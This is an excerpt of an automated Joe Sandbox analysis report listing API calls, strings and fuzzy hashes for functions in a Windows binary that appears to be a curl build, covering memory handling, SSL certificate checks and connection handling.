                                        APIs
                                        • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 000CF70B
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004), ref: 000CF738
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000CF750
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupmallocrealloc
                                        • String ID: out of memory
                                        • API String ID: 178021264-2599737071
                                        • Opcode ID: dd5a55bb8e4c17d336a6068ff0051be52cde1b8fb338dc74a8d123c5be4ed717
                                        • Instruction ID: 734fadb40d271a8e23a9ef840a34bb3f6e384d69a3881591612ea2f8d24fac90
                                        • Opcode Fuzzy Hash: dd5a55bb8e4c17d336a6068ff0051be52cde1b8fb338dc74a8d123c5be4ed717
                                        • Instruction Fuzzy Hash: 0A517778508206DFDB64CF28C594BBEBBF6FB09304F1882AED84A9B351D3709941CB52
                                        APIs
                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 0010657A
                                        Strings
                                        • SSL: failed retrieving public key from server certificate, xrefs: 0010654C
                                        • SSL: public key does not match pinned public key, xrefs: 0010653D
                                        • schannel: Failed to read remote certificate context: %s, xrefs: 00106561
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CertCertificateContextFree
                                        • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: Failed to read remote certificate context: %s
                                        • API String ID: 3080675121-2322844371
                                        • Opcode ID: 0d58a7b22bfe552548e46a48cc58b86eb6c03fde9bee49da57fc376ecf5bb0f5
                                        • Instruction ID: c917b4e4bbbe79623357a3ed84f0a99280d278635aef9c3ebb788798408218b6
                                        • Opcode Fuzzy Hash: 0d58a7b22bfe552548e46a48cc58b86eb6c03fde9bee49da57fc376ecf5bb0f5
                                        • Instruction Fuzzy Hash: 2731A331B0021A9FDB18DB28EC56BEA77A5AF44750F0440A9E449E72C1EFB0EE948E50
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E4D4E
                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000E4D65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchrstrtol
                                        • String ID: %s%s%s
                                        • API String ID: 614545126-3094730333
                                        • Opcode ID: dc54ab5a669cd36f870f55bac6935ff3867d0fab524fd3a180d739ac49c27af6
                                        • Instruction ID: 9bd4781e601296301cccf336495e4ed487577fd6b4364e58fea6d7cfc5906d98
                                        • Opcode Fuzzy Hash: dc54ab5a669cd36f870f55bac6935ff3867d0fab524fd3a180d739ac49c27af6
                                        • Instruction Fuzzy Hash: E4312532A08285EFDF15CF59EC809ADBBE6EF85324F2480A9E945EB341D7B05E40CB50
                                        APIs
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00000023,?,?,00000100,%*s,?,00116DB0), ref: 000C1A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: #$%*s$-=O=-
                                        • API String ID: 1795875747-742414071
                                        • Opcode ID: f10c9e459c38a55f51a53a52b2d2a250a229285592a3a07bb5a72894c4cd29cf
                                        • Instruction ID: 820a7d00c59166aa468f85408bafd6f703826b87fe0f1c97fc1382c6e30492b4
                                        • Opcode Fuzzy Hash: f10c9e459c38a55f51a53a52b2d2a250a229285592a3a07bb5a72894c4cd29cf
                                        • Instruction Fuzzy Hash: BA41C2707041448FDB48CF6DE884BD977E6AB99310F2482AAE889C7286D7B1D9E4CB54
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C85D1
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C861E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C864D
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 000C867C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C86F7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C8795
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strdup$malloc
                                        • String ID: option %s: %s
                                        • API String ID: 854390910-1899588186
                                        • Opcode ID: 605122c6d9cae91ba8f92715b2d27dbfcae0908cca8f8adbe58fd27398ef5180
                                        • Instruction ID: 3dcdf2543c9fe20d154aaa6b2c6a815950e429ad42ec3868d208bee702bc1eb5
                                        • Opcode Fuzzy Hash: 605122c6d9cae91ba8f92715b2d27dbfcae0908cca8f8adbe58fd27398ef5180
                                        • Instruction Fuzzy Hash: 54312531E08294AFDB769B688849FEEBFE59F55310F24C19EE49497142EF708881C798
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E2326
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E2383
                                        Strings
                                        • Too old connection (%ld seconds idle), disconnect it, xrefs: 000E2342
                                        • Too old connection (%ld seconds since creation), disconnect it, xrefs: 000E23A3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: Too old connection (%ld seconds idle), disconnect it$Too old connection (%ld seconds since creation), disconnect it
                                        • API String ID: 885266447-3566769605
                                        • Opcode ID: de19e87872c18acee7a10dcb81f0029ebe215e8063f013076032d6cf73cdefc4
                                        • Instruction ID: acfaaa9d1e7e9e712ffe0027b02df809731b1904086526d8da8d64abb9525a88
                                        • Opcode Fuzzy Hash: de19e87872c18acee7a10dcb81f0029ebe215e8063f013076032d6cf73cdefc4
                                        • Instruction Fuzzy Hash: D8110663A00A506BEB19FE3E4C46AAF369ECF56720F150164FD28BF242E8965E0106D1
                                        APIs
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000E333A
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000E336C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E33AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errnofreestrtoul
                                        • String ID: Invalid zoneid: %s; %s
                                        • API String ID: 3069384960-3603716281
                                        • Opcode ID: 00930e4d780806819d8814c4e73366faab725e5d104ef1dd9bc2c424242dbacf
                                        • Instruction ID: e065a4e33718033008de5ad282b102715b6a075c6db81f23a5e9dab2bfa66d39
                                        • Opcode Fuzzy Hash: 00930e4d780806819d8814c4e73366faab725e5d104ef1dd9bc2c424242dbacf
                                        • Instruction Fuzzy Hash: 8021D831A00218EFDB289F25DC49FED7BB9EFC5710F1040AAE915A7291DB705E858BA1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __alldvrm
                                        • String ID: "%s":$"%s":null$%I64u.%06I64u
                                        • API String ID: 65215352-1521088119
                                        • Opcode ID: 3142a57679e5de47e06a7a35db3cede102db35691033b18a7db5aedb4eaa6b63
                                        • Instruction ID: 408ced31fc557e7c8c7a98e5ca947b8d81e23964c496afe4262187600f555959
                                        • Opcode Fuzzy Hash: 3142a57679e5de47e06a7a35db3cede102db35691033b18a7db5aedb4eaa6b63
                                        • Instruction Fuzzy Hash: 9B11D571508344BFD701DF14DC42B9BBBE9FF68314F04452AF99892221E371DA708BA1
                                        APIs
                                        • GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00000000,00000001,?,?,?,000E8727,?,?,00000000,?,?,?,000E8849,00000000,?), ref: 000D2698
                                        • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E7EE5,?,?,?,000E8727,?,?,00000000,?,?,?,000E8849,00000000,?,?), ref: 000D26C4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E8849,00000000,?,?,?,000D2373,?,?,?,?,000C16C6,?,00200030), ref: 000D26DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: EnvironmentVariablefreerealloc
                                        • String ID: CURL_SSL_BACKEND
                                        • API String ID: 3604909764-3552431867
                                        • Opcode ID: 5e3e402db83cba5af89e55af642bdce20b527cad98d3bfc902639941d8f3c80c
                                        • Instruction ID: e2be52337d00a6ce4ca65b0b6117d5f78b0dc3d0bf23dabc7dbba87ccd083688
                                        • Opcode Fuzzy Hash: 5e3e402db83cba5af89e55af642bdce20b527cad98d3bfc902639941d8f3c80c
                                        • Instruction Fuzzy Hash: F801F73AA05329FB4B354B59EC0885F7AFEEBD5760712807BF801E3300D9B18C418AB5
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,HTTP,?,?), ref: 0010AE0A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AE21
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0010AE3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strdup
                                        • String ID: %s/%s
                                        • API String ID: 2653869212-2758257063
                                        • Opcode ID: 0b9436267fa6e0882ffbc1a3c5e8e689ad999204469aa8f01f45aaa0672cade9
                                        • Instruction ID: dc7d94adea8050f8d586f8b594fc1dd66a46c941f4117bf84de8897ef9d5be5f
                                        • Opcode Fuzzy Hash: 0b9436267fa6e0882ffbc1a3c5e8e689ad999204469aa8f01f45aaa0672cade9
                                        • Instruction Fuzzy Hash: 45F0A733A44530AB87191764FC099AF6BA9DFC5B71315403AF800D3391DFA41C8286E2
                                        APIs
                                        • send.WS2_32(?,000000FF,00000003,00000000), ref: 000FE8AE
                                        • WSAGetLastError.WS2_32(?,?,?,000FE787,00000000), ref: 000FE8B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLastsend
                                        • String ID: SENT$Sending data failed (%d)
                                        • API String ID: 1802528911-3459338696
                                        • Opcode ID: fd558f6887ee6aca07271cb4ab4f1204099f33023522502dbda1021ed0f9aef3
                                        • Instruction ID: cbe6385fcba2dd64315ab448b344d19d23d9ad7889f2efc80f3cb914476c276a
                                        • Opcode Fuzzy Hash: fd558f6887ee6aca07271cb4ab4f1204099f33023522502dbda1021ed0f9aef3
                                        • Instruction Fuzzy Hash: DDF02431204348BFD705A799EC0AEEF3BADDB49770F1080A8F505973D2EA619E0083A0
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2EDF
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2F0B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2F22
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: calloc$free
                                        • String ID:
                                        • API String ID: 171065143-0
                                        • Opcode ID: 15b4c94cc28bb0ca4582c3df7cf14447276d99fb58cac246d538c17a96c4593b
                                        • Instruction ID: 511ef9b418869886f2e4b7591aa3eb1a827c9cd9c8299eefa5aecc810b9f3e41
                                        • Opcode Fuzzy Hash: 15b4c94cc28bb0ca4582c3df7cf14447276d99fb58cac246d538c17a96c4593b
                                        • Instruction Fuzzy Hash: 1AB18875508681CECB16CF2988887D67FE1AF59310F2880FADC499F347D7729946CBA0
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000017,00000017,?,000EEB2F,?,?,?,?,?), ref: 0010016B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,000DE01D,00000000,00000000,?), ref: 001001A4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000DE01D), ref: 001001CA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000DE01D), ref: 00100222
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,000DE01D,00000000,00000000,?), ref: 00100234
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID:
                                        • API String ID: 2190258309-0
                                        • Opcode ID: 9a57ff1909bbe4d4ffe79627d7f3cceea09336caac7cbdb32120bf18d07bd592
                                        • Instruction ID: a7cd604643ff3f9502741b65490f5dbf74251acab21a5319fd4025421e319f40
                                        • Opcode Fuzzy Hash: 9a57ff1909bbe4d4ffe79627d7f3cceea09336caac7cbdb32120bf18d07bd592
                                        • Instruction Fuzzy Hash: 1E31E335610214DFCB099F18EC4869D7BF6FF88320F14C06AE805DB390DBB09C418BA5
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E11DA
                                          • Part of subcall function 000D0D8D: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0DA4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E11F3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1208
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1231
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1246
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID:
                                        • API String ID: 2190258309-0
                                        • Opcode ID: f116c33146e0daff08ca5f0ca614606c9c01946a66d229c812df17389d0c719c
                                        • Instruction ID: c86b77ecd93d23317a65a345e47a0a66b767d8acd4218dbb808b7775cf5a43cc
                                        • Opcode Fuzzy Hash: f116c33146e0daff08ca5f0ca614606c9c01946a66d229c812df17389d0c719c
                                        • Instruction Fuzzy Hash: AC31D432B00655DFCB648F1ADC446AD73E6EF84320F14807EDA05F7251CB70AC528BA6
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010ABCC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010ABFD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010AC1F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AC36
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AC50
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: d69807cf72c66008aea449b9fac545bb1cc6fb3fb20a4610c0f0395398a9d7fd
                                        • Instruction ID: 2d08edd8c0b6faf9c64c7aa67ad7ae94870ba32855edc3fce02ebe921d2c957f
                                        • Opcode Fuzzy Hash: d69807cf72c66008aea449b9fac545bb1cc6fb3fb20a4610c0f0395398a9d7fd
                                        • Instruction Fuzzy Hash: B421F575A14926EFCB089F65EE44458BBB2FF48361310813BE81593A61CB74AC61CFD5
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FDD98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
                                        • API String ID: 1294909896-4272885751
                                        • Opcode ID: c27bbf587c0c8fff556ac8bef51b5f8d9b67aaad6bb8a0624818814864b2dd36
                                        • Instruction ID: 592fd3e9f8a4f1a04273a4701a523099eb16098f1283402bb40d4f07283bae2e
                                        • Opcode Fuzzy Hash: c27bbf587c0c8fff556ac8bef51b5f8d9b67aaad6bb8a0624818814864b2dd36
                                        • Instruction Fuzzy Hash: EC617E71B00606EFCB68DF64C880AB9F7E2BF94304F14416BDA1A9B751DB31B854EB91
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F741B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F759B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F75B6
                                        Strings
                                        • Failed to alloc scratch buffer, xrefs: 000F7427
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$malloc
                                        • String ID: Failed to alloc scratch buffer
                                        • API String ID: 2190258309-2192203314
                                        • Opcode ID: 27c43769652d1062edc3321c5299b3e06b3fb67a92f3c66107d04bfe6c601dee
                                        • Instruction ID: 6a4ef1f99d55c44e20f7be7924e333ea1ac7efcd6df3308e5de052a4720d47cb
                                        • Opcode Fuzzy Hash: 27c43769652d1062edc3321c5299b3e06b3fb67a92f3c66107d04bfe6c601dee
                                        • Instruction Fuzzy Hash: 64619171E0460A9FCB18CFA8D984ABEBBF5FF48310F1481AAD509E7341D770AA51DB91
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F6E3D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F6F1D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: .
                                        • API String ID: 1294909896-916926321
                                        • Opcode ID: f17fd2aaee2fac275f76fb12565d19e44fa58c266dba9ae5dc6aaadda9033f4c
                                        • Instruction ID: 66a19f9cb572e6c7e4333613aaf627b6f61175d954efd986d1086a8f394b0bcf
                                        • Opcode Fuzzy Hash: f17fd2aaee2fac275f76fb12565d19e44fa58c266dba9ae5dc6aaadda9033f4c
                                        • Instruction Fuzzy Hash: CD51B07160821ADFCB24CF24E84476AFBE5FF84760F14857AF9488B641DB71A848DBD2
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC7FA
                                        Strings
                                        • REFUSED_STREAM, retrying a fresh connect, xrefs: 000EC72F
                                        • Connection died, retrying a fresh connect (retry count: %d), xrefs: 000EC777
